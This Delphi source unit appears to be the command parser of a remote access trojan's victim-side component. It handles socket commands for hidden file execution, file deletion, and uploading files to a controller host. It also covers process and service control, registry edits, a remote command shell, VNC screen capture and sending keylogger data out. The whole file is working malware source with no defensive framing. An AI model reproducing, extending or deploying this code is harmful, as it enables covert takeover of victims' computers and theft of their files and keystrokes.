unit uParser;

interface
uses
  uCommands, windows, uFilemanager, uFunctions, uProcessmanager,
  uWindow, uService, uScreenshot, winsock, uRegistry, uRemoteShell;
procedure ParseCommand(sSocket:Integer);

implementation
uses uConnection;
Procedure StripOutCmd(Text: String; VAR Cmd: String);
Begin Cmd := Copy(Text, 1, Pos('|', Text)-1); End;

Procedure StripOutParam(Text: String; VAR Param: Array of String);
Var
  I: Word;
Begin
  If Text = '' Then Exit;
  FillChar(Param, SizeOf(Param), 0);
  Delete(Text, 1, Pos('|', Text));
  If Text = '' Then Exit;
  If (Text[Length(Text)] <> '|') Then Text := Text + '|';
  I := 0;
  While (Pos('|', Text) > 0) Do
  Begin
    Param[I] := Copy(Text, 1, Pos('|', Text)-1);
    Inc(I);
    Delete(Text, 1, Pos('|', Text));
    If (I >= 100) Then Break;
  End;
End;

procedure ParseCommand(sSocket:Integer);
var
  sData, sBuff, sFullData, sString:String;
  bPackInfos:TPacketInformation;
  Param: Array[0..100]of String;
  pointerInfo:Pointer;
  cThread, cRead:Cardinal;
  lRecvLen:Integer;
  F:File;
  sComm:Byte;
  bBuff:array[0..4095] of Byte;
  arrBuffer:array[0..1000] of Byte;
begin
  repeat
    sFullData := '';
    ZeroMemory(@arrBuffer[0], 1001);
    lRecvLen := Recv(sSocket,arrBuffer[0],1001,0);
    if lRecvLen <= 0 then break;
    SetLength(sBuff,lRecvLen);
    MoveMemory(@sBuff[1],@arrBuffer[0],lRecvLen);
    sFullData := sFullData + sBuff;
    repeat
      bPackInfos := VerifyPacket('',sFullData);
      sFullData := bPackInfos.PacketLeft;
      sString := bPackInfos.PacketCommand;
      sComm := bPackInfos.PacketByte;
      if bPackInfos.PacketFinished = False then
        break;
      case sComm of
        PACK_RESTART:closesocket(sSocket);
        PACK_CLOSE:ExitProcess(0);
        PACK_GETDRIVES:
          begin
            sData := GetDrives;
            SendPacket(sSocket,PACK_GETDRIVES,sPassword, sData);
          end;
        PACK_GETDIRS:
          begin
            sData := ListFileDir(sString,True);
            SendPacket(sSocket,PACK_GETDIRS,sPassword, sData);
            Sleep(100);
            sData := ListFileDir(sString,False);
            SendPacket(sSocket,PACK_GETFILES,sPassword, sData);
          end;
        PACK_EXECUTEFILEVISIBLE:
          begin
            If ExecuteFile(sString, True) then
              sData := '1'
            else
              sData := '0';
            SendPacket(sSocket,PACK_EXECUTEFILEVISIBLE,sPassword, sData);
          end;
        PACK_EXECUTEFILEHIDDEN:
          begin
            If ExecuteFile(sString, False) then
              sData := '1'
            else
              sData := '0';
            SendPacket(sSocket,PACK_EXECUTEFILEVISIBLE,sPassword, sData);
          end;
        PACK_DELETEFILE:
          begin
            If DeleteFile(Pchar(sString)) then
              sData := '1'
            else
              sData := '0';
            SendPacket(sSocket,PACK_DELETEFILE,sPassword, sData);
          end;
        PACK_MOVEFILE:
          begin
            StripOutParam(sString,Param);
            If altMoveFile(Param[0],Param[1],Param[2]) then
              sData := '1'
            else
              sData := '0';
            SendPacket(sSocket,PACK_MOVEFILE,sPassword, sData);
          end;
        PACK_TRANSFERFILE:
          begin
            StripOutParam(sString,Param);
            sString := Param[1] + '|' + Param[2] + '|' + Inttostr(GetFileSize(Param[0]));
            GetMem(pointerInfo,SizeOf(TInfo));
            PInfo(pointerInfo)^.scHost := sHost;
            PInfo(pointerInfo)^.scPort := iPort;
            PInfo(pointerInfo)^.scPassword := sPassword;
            PInfo(pointerInfo)^.scData := sString;
            PInfo(pointerInfo)^.scPackHead := PACK_DOWNLOADFILE;
            BeginThread(NIL, 0, @DoConnectionJob, pointerInfo, 0, cThread);
          end;
        PACK_DOWNLOADFILE:
          begin
            AssignFile(F, sString);
            Reset(F, 1);
            Repeat
              ZeroMemory(@bBuff[0],4096);
              BlockRead(F, bBuff[0], Length(bBuff), cRead);
              If (cRead <= 0) Then Break;
              If send(sSocket,bBuff[0],cRead,0) <= 0 then break;
            Until 1 = 3;
            CloseFile(F);
            closeSocket(sSocket);
            ExitThread(0);
          end;
        PACK_PROCESSES:
          begin
            sData := ListProcess;
            SendPacket(sSocket,PACK_PROCESSES,'', sData);
          end;
        PACK_TERMINATEPROCESS:
          begin
            If TerminateProcessbyPID(StrToInt(sString)) then
              sData := '1'
            else
              sData := '0';
            SendPacket(sSocket,PACK_TERMINATEPROCESS,'', sData);
          end;
        PACK_ENUMWINDOW:
          begin
            sData := GetWindows;
            SendPacket(sSocket,PACK_ENUMWINDOW,'', sData);
          end;
        PACK_WINDOWMAX:
          begin
            WindowMaximize(StrToInt(sString));
            sData := '1';
            SendPacket(sSocket,PACK_WINDOWMAX,'', sData);
          end;
        PACK_WINDOWMIN:
          begin
            WindowMinimize(StrToInt(sString));
            sData := '1';
            SendPacket(sSocket,PACK_WINDOWMIN,'', sData);
          end;
        PACK_WINDOWCLOSE:
          begin
            CloseWindow(StrToInt(sString));
            sData := '1';
            SendPacket(sSocket,PACK_WINDOWMIN,'', sData);
          end;
        PACK_ENUMSERVICE:
          begin
            sData := ServiceList;
            SendPacket(sSocket,PACK_ENUMSERVICE,'', sData);
          end;
        PACK_STARTSERVICE:
          begin
            ServiceStatus(sString,true,true);
            sData := '1';
            SendPacket(sSocket,PACK_STARTSERVICE,'', sData);
          end;
        PACK_STOPSERVICE:
          begin
            ServiceStatus(sString,true,false);
            sData := '1';
            SendPacket(sSocket,PACK_STOPSERVICE,'', sData);
          end;
        PACK_REQUESTVNC:
          begin
            StripOutParam(sString,Param);
            sString := Param[0] + '|' + GetSymetrics;
            GetMem(pointerInfo,SizeOf(TInfo));
            PInfo(pointerInfo)^.scHost := sHost;
            PInfo(pointerInfo)^.scPort := iPort;
            PInfo(pointerInfo)^.scPassword := sPassword;
            PInfo(pointerInfo)^.scData := sString;
            PInfo(pointerInfo)^.scPackHead := PACK_VNCSOCKET;
            BeginThread(NIL, 0, @DoConnectionJob, pointerInfo, 0, cThread);
          end;
        PACK_KEYLOGREQUEST:
          begin
            sString := sString;
            GetMem(pointerInfo,SizeOf(TInfo));
            PInfo(pointerInfo)^.scHost := sHost;
            PInfo(pointerInfo)^.scPort := iPort;
            PInfo(pointerInfo)^.scPassword := sPassword;
            PInfo(pointerInfo)^.scData := sString;
            PInfo(pointerInfo)^.scPackHead := PACK_KEYLOGSEND;
            BeginThread(NIL, 0, @DoConnectionJob, pointerInfo, 0, cThread);
          end;
        PACK_ENUMKEYS:
          begin
            sData := ListKeys(sString);
            SendPacket(sSocket,PACK_ENUMKEYS,'',sData);
            Sleep(100);
            sData := ListValues(sString);
            SendPacket(sSocket,PACK_ENUMVALUES,'',sData);
          end;
        PACK_SHELLSTART:
          begin
            StartCMDThread(sSocket);
          end;
        PACK_SHELLDATA:
          begin
            RemoteShellWriteData(sString + #13 +#10);
          end;
        PACK_REGADD:
          begin
            StripOutParam(sString,Param);
            If AddRegValue(param[0],param[2],param[1]) then
              sData := '1'
            else
              sData := '0';
            SendPacket(sSocket,PACK_REGADD,'', sData);
          end;
        PACK_REGDELETE:
          begin
            If DeleteRegKey(sString) then
              sData := '1'
            else
              sData := '0';
            SendPacket(sSocket,PACK_REGDELETE,'', sData);
          end;
        PACK_REGRENAME:
          begin
            StripOutParam(sString,Param);
            If RenameRegistryItem(param[0],param[1]) then
              sData := '1'
            else
              sData := '0';
            SendPacket(sSocket,PACK_REGRENAME,'', sData);
          end;
      end;
    until sFullData = '';
  until 1 = 3;
end;
end.
